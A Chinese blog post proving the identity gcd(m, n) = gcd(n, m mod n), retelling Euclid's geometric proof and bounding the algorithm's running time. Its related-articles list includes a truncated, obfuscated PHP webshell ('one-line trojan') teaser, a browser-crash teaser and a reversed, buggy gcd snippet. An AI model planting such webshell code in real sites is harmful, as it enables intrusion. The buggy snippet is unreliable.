写诗或者写程序的时候,我们经常要跟欧几里得算法打交道。然而有没要考虑到为什么欧几里得算法是有效且高效的,一些偏激(好吧,请允许我用这个带有浓重个人情感色彩的词汇)的计算机科学家认为,除非程序的正确性在数学上得到了完全严格的证实,否则我们不能认为程序是正确的。既然存在即合理,因此下面我就详细得解说一下欧几里得算法,它为什么是正确的算法(算法过程就不给出了,有了思想,无论是迭代还是循环实现应该都不成问题),为什么有那么好的时间复杂性。

首先还是证明上述命题:注意到证明了该命题就证明了欧几里得算法的正确性。

证明:令d = gcd(m, n),则d|m 且d|n。设m = kn + r(0≤ r < n),则 d|(kn+r)。又有d|n,因此d|kn,所以有d|r。即我们由d|m 且d|n 这个前提可以得出d|r。换就话说,我们也可以说成由d|m 且d|n 这个前提推出了d|n 且 d|r。使用类似的推理过程同样可以得到:由d|n 且 d|r 可以推出d|m 且 d|n。注意到这里的r 即 m mod n。因此我们可以说gcd(m, n) = gcd(n, m mod n)是双向成立的,命题得证。

关于欧几里得定理我还是想多说一点,那就是欧几里得本人给出的证明过程,他的思维清晰,逻辑严密,虽然采用的几何证法,但是不失严密和优美。下面我就简略地复述一遍我们敬爱的欧几里得先生给出的证明,原版证明见欧几里得的成名作品《几何原本》:如果m 和n 互素,那么它们的最大公约数显然是1。如果两者不互素的话:首先,想象两段线段,它们的长度分别是m 和n。姑且把他们称作线段AB 和CD。我们取其中较短的一段量取另一段,姑且认为CD 是其中较短的线段,如果CD 量尽AB,这时它也量尽它自己,那么CD 就是CD、AB的一个公度数,显然CD 同时也是最大公度数,因为没有比CD 大的数能量尽CD。但是,如果CD 量不尽AB,那么从AB,CD中的较大者中不断地减去较小者,如此,将有一个余数能量尽它前面一个。我们说这个数就是m 和n 的最大公度数,为什么呢?假设这个余数不是最大公度数,那么必有大于该数的一个数能量尽AB 和 CD,最后我们能推出大于该余数的这个数能量尽这个余数,注意到这是不可能的,因为较大的数量尽较小的数是不可能的。通过这个反证的过程,我们知道没有大于该余数的数能量尽AB,CD。因而这个数就是AB 和 CD也即m 和n 的最大公度数。

好了,证明到这里先告一段落,下面我们来考察一下欧几里得算法的效率。

令r0 = m mod n, r1 = n mod r0。于是有gcd(m, n) = gcd(n, r0) = gcd(r0, r1)。只需要注意到这一事实:r0 < m/2 或者 r1 < n/2。就可以知道在两步之内算法的规模减半了,也就是说,其时间复杂度为2logn = O(logn)。这就是其时间复杂度的上界。如果你随便写一个算法,它的时间复杂度是O(logn),那么世界该有多么美好啊。

All Rights Reserved.
Author:海峰:)
Copyright © xp_jiang.
转载请标明出处:http://www.cnblogs.com/xpjiang/p/4485409.html

欧几里得算法:从证明等式gcd(m, n) = gcd(n, m mod n)对每一对正整数m, n都成立说开去的更多相关文章

  1. Algorithms4th 1.1.25 欧几里得算法——数学归纳法证明

    欧几里得算法的自然语言描述 计算两个非负整数p和q的最大公约数: 若q是0,则最大公约数为p.否则将p除以q得到余数r,p和q的最大公约数即为q和r的最大公约数. 数学归纳法证明 基础步骤: 若q = ...

  2. 浅谈欧几里得算法求最大公约数(GCD)的原理及简单应用

    一.欧几里得算法及其证明 1.定义: 欧几里得算法又称辗转相除法,用于求两数的最大公约数,计算公式为GCD(a,b)=GCD(b,a%b): 2.证明: 设x为两整数a,b(a>=b)的最大公约 ...

  3. 欧几里得算法(gcd) 裴蜀定理 拓展欧几里得算法(exgcd)

    欧几里得算法 又称辗转相除法 迭代求两数 gcd 的做法 由 (a,b) = (a,ka+b) 的性质:gcd(a,b) = gcd(b,a mod b) int gcd(int a,int b){ ...

  4. 欧几里得 &amp; 拓展欧几里得算法 解说 (Euclid &amp; Extend- Euclid Algorithm)

    欧几里得& 拓展欧几里得(Euclid & Extend-Euclid) 欧几里得算法(Euclid) 背景: 欧几里德算法又称辗转相除法.用于计算两个正整数a.b的最大公约数. -- ...

  5. 欧几里得(Euclid)与拓展的欧几里得算法

    欧几里得(Euclid)与拓展的欧几里得算法 欧几里得(Euclid)与拓展的欧几里得算法 欧几里得算法 原理 实现 拓展的欧几里得算法 原理 递归求解 迭代求解 欧几里得算法 原理 欧几里得算法是一 ...

  6. [数学基础] 4 欧几里得算法&扩展欧几里得算法

    欧几里得算法 欧几里得算法基于的性质: 若\(d|a, a|b\),则\(d|(ax+by)\) \((a,b)=(b,a~mod~b)\) 第二条性质证明: \(\because a~mod~b=a ...

  7. 扩展欧几里得算法(extgcd)

    相信大家对欧几里得算法,即辗转相除法不陌生吧. 代码如下: int gcd(int a, int b){ return !b ? gcd(b, a % b) : a; } 而扩展欧几里得算法,顾名思义 ...

  8. 关于欧几里得算法(gcd)的证明

    求a,b的最大公约数我们经常用欧几里得算法解决,也称辗转相除法, 代码很简短, int gcd(int a,int b){ return (b==0)?a:gcd(b,a%b); } 但其中的道理却很 ...

  9. 初等数论-Base-2(扩展欧几里得算法,同余,线性同余方程,(附:裴蜀定理的证明))

    我们接着上面的欧几里得算法说 扩展欧几里得算法 扩展欧几里德算法是用来在已知a, b求解一组x,y,使它们满足贝祖等式\(^①\): ax+by = gcd(a, b) =d(解一定存在,根据数论中的 ...

随机推荐

  1. usaco silver刷水~其实是回顾一下,补题解

    [BZOJ1606][Usaco2008 Dec]Hay For Sale 裸01背包 ;i<=n;i++) for(int j=m;j>=a[i];j--) f[j]=max(f[j], ...

  2. Java中系统属性Properties介绍 System.getProperty()参数大全

       在JDK文档中System类中有这样的方法getProperties()在此方法的详细介绍中有下面的参数可供使用: java.version Java 运行时环境版本 java.vendor J ...

  3. 李洪强iOS经典面试题125

    1.objective-c 是所有对象间的交互是如何实现的? 在对象间交互中每个对象承担的角色不同,但总的来说无非就是"数据的发送者"或"数据的接收者"两种角色 ...

  4. 【android】新手容易遇到的[error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'.]Theme出错的问题

    一.概述 近期刚接手了一个项目,开发工具为eclipse,由于版本较低,且考虑到如果转android studio项目的话,会其他人的维护带来困难,所以想着还是维护项目原来的开发环境吧. 但是导入项目 ...

  5. 【转】Selenium WebDriver + Python 环境

    转自:http://www.myext.cn/webkf/a_11878.html 1. 下载必要工具及安装包 1.1 [Python开发环境] 下载并安装Python 2.7.x版本 下载地址:ht ...

  6. Odoo 路线规则实现机制浅析

    事情是这个样子的:项目在实施过程中,碰到A仓库向B仓库供货的情况,心想这还不简单,老老实实地建多个仓库并将B仓库的供货仓库选为A仓库,再设置好产品的再订购规则,万事大吉了.然而,事情并非想象的那么简单 ...

  7. javascript特效--制作背景电子钟(整点时祝贺生日快乐)

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  8. 在cenOS下安装apache出现-bash: /etc/init.d/httpd: 没有那个文件或目录

    我是在vmware上装的centos7,使用命令yum install httpd httpd-devel 安装完apache后,想要启动apache,执行了/etc/init.d/httpd sta ...

  9. 一段能导致火狐、谷歌Safari浏览器崩溃,甚至让iPhone重启的代码

    JavaScript代码,能导致火狐.谷歌Safari浏览器崩溃,甚至让iPhone重启 <html> <body> <script> var total = &q ...

  10. 最新php一句话木马

    <?php $uf=”snc3″; $ka=”IEBldmFbsK”; $pjt=”CRfUE9TVF”; $vbl = str_replace(“ti”,””,”tistittirti_rti ...